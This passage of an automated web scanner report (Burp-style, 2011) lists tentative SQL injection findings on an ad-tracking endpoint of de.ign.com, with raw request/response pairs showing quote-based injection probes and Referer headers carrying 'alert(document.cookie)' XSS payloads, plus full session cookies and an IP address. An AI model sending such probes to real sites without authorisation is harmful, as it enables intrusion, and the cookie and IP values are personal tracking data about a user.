Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9216,9217,9337,9598,9613,9840,10951,11754,13203,14845,15232,16249,16251,16895,20543,22099,22153,22854,23367,23425,23427,23472,23479,23480,23493&Targets=10619,11379,28685,11380,11522,17087&Values=25,31,43,60,72,80,91,101,110,150,152,235,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,7473,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bynKldq,bguRragewbmAn HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:31 GMT
Connection: close
Vary: Accept-Encoding


1.32. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cnesoxW,bguRrfrbdmWai [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cnesoxW,bguRrfrbdmWai

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cnesoxW,bguRrfrbdmWai HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=cnesoxW,bguRrfrbdmWai HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:49 GMT
Connection: close
Vary: Accept-Encoding


1.33. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bsrfnRp,bguRragewbmAx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bsrfnRp,bguRragewbmAx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bsrfnRp,bguRragewbmAx HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=379,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11687,11690,11714,11716,11754,14845,15232,16249,16251,17917,17920,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6887,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,281,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=bsrfnRp,bguRragewbmAx HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:33 GMT
Connection: close
Vary: Accept-Encoding


1.34. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=dlkpdlI,bguRrfrbdmWas [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=dlkpdlI,bguRrfrbdmWas

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=dlkpdlI,bguRrfrbdmWas HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=49282&FlightID=44822&TargetID=10619&EntityDefResetFlag=0&C=0&Segments=380,2747,4602,4603,4723,4917,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11688,11691,11715,11717,11754,14845,15232,16249,16251,17918,17919,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6766,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,282,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=dlkpdlI,bguRrfrbdmWas HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:48 GMT
Connection: close
Vary: Accept-Encoding


